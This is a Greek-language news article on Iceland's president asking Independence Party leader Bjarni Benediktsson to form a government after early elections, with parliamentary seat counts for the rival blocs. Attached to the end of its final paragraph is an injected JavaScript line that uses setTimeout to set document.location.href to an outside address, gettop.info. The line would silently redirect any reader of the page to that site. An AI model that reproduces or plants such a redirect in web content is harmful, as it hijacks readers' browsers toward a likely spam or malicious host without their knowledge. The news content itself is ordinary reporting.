Ισλανδία: Το Κόμμα της Ανεξαρτησίας έλαβε εντολή να σχηματίσει κυβέρνηση

0
10

 

Ο πρόεδρος της Δημοκρατίας της Ισλανδίας Γκούντνι Γιόχανεσον ανακοίνωσε ότι ανέθεσε στον συντηρητικό Μπιάρνι Μπένεντικτσον, το Κόμμα της Ανεξαρτησίας του οποίου κατέλαβε την πρώτη θέση στις πρόωρες εκλογές που διεξήχθησαν στη χώρα το Σάββατο, εντολή να σχηματίσει την επόμενη κυβέρνηση της χώρας.
Ο Μπένεντικτσον, το κόμμα του οποίου κατέλαβε τις 21 από τις 63 έδρες της ισλανδικής Βουλής, μοιάζει να έχει τις περισσότερες πιθανότητες να συστήσει μια κυβέρνηση που θα διαθέτει κοινοβουλευτική πλειοψηφία.

Εάν οι διαπραγματεύσεις, που αναμένεται να είναι σκληρές, δεν καρποφορήσουν, ο πρόεδρος μπορεί να ζητήσει από τον αρχηγό κάποιου άλλου κόμματος να σχηματίσει κυβέρνηση.

Στις πρόωρες εκλογές του Σαββάτου δεν αναδείχθηκε ξεκάθαρος νικητής. Η απερχόμενη κυβερνητική συμμαχία της δεξιάς, που είχαν συγκροτήσει το Κόμμα της Προόδου και το Κόμμα της Ανεξαρτησίας, δεν συγκέντρωσε παρά 29 έδρες και απώλεσε την απόλυτη πλειοψηφία που διέθετε. Η συμμαχία της κεντροαριστεράς υπό την ηγεσία του Κόμματος των Πειρατών—ενός μορφώματος που αμφισβητεί το πολιτικό κατεστημένο—εξασφάλισε 27 έδρες. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here